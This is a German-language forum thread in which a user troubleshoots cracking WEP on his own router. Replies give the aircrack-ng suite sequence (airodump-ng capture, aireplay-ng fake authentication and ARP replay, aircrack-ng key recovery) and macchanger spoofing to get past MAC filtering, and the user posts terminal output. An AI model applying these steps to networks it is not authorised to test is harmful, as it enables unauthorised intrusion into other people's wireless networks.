Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: WEP Cracking Frage (Packete)

  1. #1
    -Xeon-
    Guest

    Default WEP Cracking Frage (Packete)

    Hallo... wollte heute mal Probieren unseren Router zu hacken... habe testweise ihn auf wep verschlüsslung umgestellt.
    Mit dem Befehl
    airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
    Bringe ich den Router ja dazu mehr Packete zuschicken.
    Habe in Tuts gelesen das man so paar tausend packete "sammeln" sollte... was ist denn eig. wenn man die gesammelt hat?
    Weil bei den meisten Tuts oder Vids wird man irgendwann gefragt ob man die Packete benutzen will... bei mir sammelt der einfach die ganze zeit packete...
    wisst ihr was ich meine?
    Vllt könnt ihr mal weiter helfen.

    Lg Xeon

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Normalerweise sollten die Tuts dann genau alles beschreiben.

    Hast du schonmal in unserer Howto-Sektion geschaut?
    Tiocfaidh ár lá

  3. #3
    Member
    Join Date
    Jan 2010
    Posts
    81

    Default

    naja wenn du die richtige packete sammelst dann musst du aircrack-ng starten und den key berechnen zu lassen...

    ozzy

  4. #4
    -Xeon-
    Guest

    Default

    ja ich hatte schon in vielen tuts geguckt aber keine antwort gef... meist steht dort einfach nur der Befehl "airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device] " und dann wird auch schon angezeigt ob man die Packete verwenden möchte und bestätigen soll man dann eig. mit "y".
    Aber weiter als das er anfängt die gesammelten Packete zu sammeln komme ich nicht... also ich komm nicht zu der Frage ob man die Packete eben verwenden möchte(in der Datei speichern)
    In den meisten HowTo's ist es nicht so toll erklärt
    z.B. "Nachdem Du ca 10.000 - 20.000 Packete gesammelt hast können wir mit dem entschlüsseln des WEP Schlüssels beginnen..." Steht eben nicht wie man das Packete sammeln beendet... klar ich kann strg+c drücken aber dann speichert er die gesammelte packete ja nicht ab...
    link zum tut
    hxxp://board.protecus.de/t34622.htm

    Wollte mir das Tut angucken (German) Tutorial WEP Crack aus dem
    HowTo Bereich allerdings geht der Link irgendwie nicht?!

    Lg thx schonmal =)

  5. #5

    Default

    = )
    airodump-ng -w (dateiname später wichtig für aircrack-ng!) -c (channel halt ) -bssid (bssid AP) wlan0 (oder dein Device halt)
    aireplay-ng -1 0 -a (bssid AP) wlan0
    aireplay-ng -3 -b (bssid AP) -h (deine mac) wlan sofern jemand auf dem AP angemeldet ist und surft dürfte er anfangen zu Zählen

    dann einfach aircrack-ng (dateiname von schritt1)

    und fertig = )

    mfg Reeth
    www.myownremote.blogspot.com

  6. #6
    -Xeon-
    Guest

    Default

    So habe mir jetzt einen usb w-lan stick gekauft mit einem rtl8187 chip... läuft ja out of box...
    nun wollte ich es eben probieren am netbook wep zucracken... wird auch alles erkannt etc... nur komme ich bei einem schritt nicht weiter und zwar
    "aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device] "
    Normal sollte nach einer Zeit association successful erscheinen... allerdings kommt bei mir nur dies:
    Code:
     
    bt ~ # aireplay-ng -1 0 -e test -a 00:17:9A:66:31:7B -h 00:11:22:33:44:55 wlan0
    
    07:50:40  Waiting for beacon frame (BSSID: 00:17:9A:66:31:7B) on channel 6
    
    
    07:50:40  Sending Authentication Request (Open System) [ACK]
    
    
    07:50:42  Sending Authentication Request (Open System) [ACK]
    
    
    07:50:44  Sending Authentication Request (Open System) [ACK]
    
    
    07:50:46  Sending Authentication Request (Open System) [ACK]
    
    
    07:50:48  Sending Authentication Request (Open System)
    
    
    07:50:50  Sending Authentication Request (Open System) [ACK]
    
    
    07:50:52  Sending Authentication Request (Open System) [ACK]
    Habe auch mal eine andere mac Adresse gefakt mit paar Buchstaben weil ich mir gedacht hab das vllt der Router die mac Adresse blockt...
    Jemand eine Idee was ich Falsch mache?
    Zur Kontrolle ob ich was vergessen hatte, habe ich das Tut meist benutzt
    hxxp://board.protecus.de/t34622.htm
    Lg =)

  7. #7

    Default

    Ja, das sieht ganz nach mac filter aus

    macchanger --mac (mac und dann dein Device wlan0 denk ich
    www.myownremote.blogspot.com

  8. #8
    -Xeon-
    Guest

    Default

    hab ja schon mac geändert gehabt... denke mal muss ich mal an einem anderen netz ausprobiere...
    hatte irgendwie eine mac adresse von 0C:2F:35:7B usw... desw. denke ich mal entweder mach ich was falsch oder der router lässt komplett keine neue mac adressen zu

  9. #9
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Quote Originally Posted by -Xeon- View Post
    hab ja schon mac geändert gehabt... denke mal muss ich mal an einem anderen netz ausprobiere...
    hatte irgendwie eine mac adresse von 0C:2F:35:7B usw... desw. denke ich mal entweder mach ich was falsch oder der router lässt komplett keine neue mac adressen zu
    Wieviele Netze hast du denn in deiner Umgebung?
    Tiocfaidh ár lá

  10. #10
    -Xeon-
    Guest

    Default

    2 Normale, davon 1 mir und das anderen vom Nachbar und dann noch ca. 4 Hidden(hab ich mit der W-Lan Karte gef.) die ich aber mit dem USB Stick nicht mehr gef. habe (glaub reichweite zu klein)

    Edit:
    Stelle meinen Router mal kurz auf WEP um und teste es dann mal

    Edit2:
    Das gleiche auch bei meinem Router o.O

    Edit3: so hab es mal dokumentiert wie ich es bisher gemacht habe...
    Ist es eig. normal das wenn ich ihm sage er soll die packete in der datei "test" speichern, dass er dann mehrere "Test" dateien auf dem desktop speichert? (Test01,Test02...)

    Code:
    root@xeon-desktop:~# airmon-ng
    
    
    Interface       Chipset         Driver
    
    ra0             Ralink 2560 PCI rt2500
    wlan0           RTL8187         rtl8187 - [phy0]
    
    root@xeon-desktop:~# airmon-ng stop wlan0
    
    
    Interface       Chipset         Driver
    
    ra0             Ralink 2560 PCI rt2500
    wlan0           RTL8187         rtl8187 - [phy0]
                                    (monitor mode disabled)
    
    root@xeon-desktop:~# ifconfig wlan0 down
    root@xeon-desktop:~# macchanger --mac O2:1F:22:3B:F4:55 wlan0
    Current MAC: 00:e0:4c:03:44:e8 (Realtek Semiconductor Corp.)
    Faked MAC:   00:1f:22:3b:f4:55 (unknown)
    root@xeon-desktop:~# airmon-ng start wlan0
    
    
    Interface       Chipset         Driver
    
    ra0             Ralink 2560 PCI rt2500
    wlan0           RTL8187         rtl8187 - [phy0]
                                    (monitor mode enabled on mon0)
    
    root@xeon-desktop:~# airodump-ng mon0
    
     CH  2 ][ Elapsed: 4 s ][ 2009-07-11 13:34
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:9A:66:31:7B  -74        5        0    0   6  54 . WEP  WEP         test
     00:15:0C:5C:C8:03  -73        6        2    0   8  54e  WPA2 CCMP   PSK  FRITZ
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:15:0C:5C:C8:03  00:19:5B:3C:9E:A8  -30    0 -54e     0        2
    
    root@xeon-desktop:~# airodump-ng -c 6 -w Packete --bssid 00:17:9A:66:31:7B mon0
    
    CH  6 ][ Elapsed: 1 min ][ 2009-07-11 13:39
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:9A:66:31:7B  -73  93     1023        0    0   6  54 . WEP  WEP         test
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:17:9A:66:31:7B  00:1F:22:3B:F4:55    0    0 - 1      0       12
    
    root@xeon-desktop:~# aireplay-ng -1 0 -a 00:17:9A:66:31:7B -h 00:1f:22:3b:f4:55 -e test mon0
    The interface MAC (00:E0:4C:03:44:E8) doesn't match the specified MAC (-h).
            ifconfig mon0 hw ether 00:1F:22:3B:F4:55
    13:37:17  Waiting for beacon frame (BSSID: 00:17:9A:66:31:7B) on channel 6
    
    13:37:17  Sending Authentication Request (Open System) [ACK]
    
    13:37:19  Sending Authentication Request (Open System) [ACK]
    
    13:37:21  Sending Authentication Request (Open System) [ACK]
    
    13:37:23  Sending Authentication Request (Open System) [ACK]

    Code:
    ra0             Ralink 2560 PCI rt2500
    wlan0           RTL8187         rtl8187 - [phy0]
                                    (monitor mode enabled on mon0)
    Da der monitor mode auf mon0 enabled ist habe ich mir gedacht muss ich als device mon0 nehme und nich wlan0... wenn ich es mit wlan0 mache geht es allerdings auch nicht.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •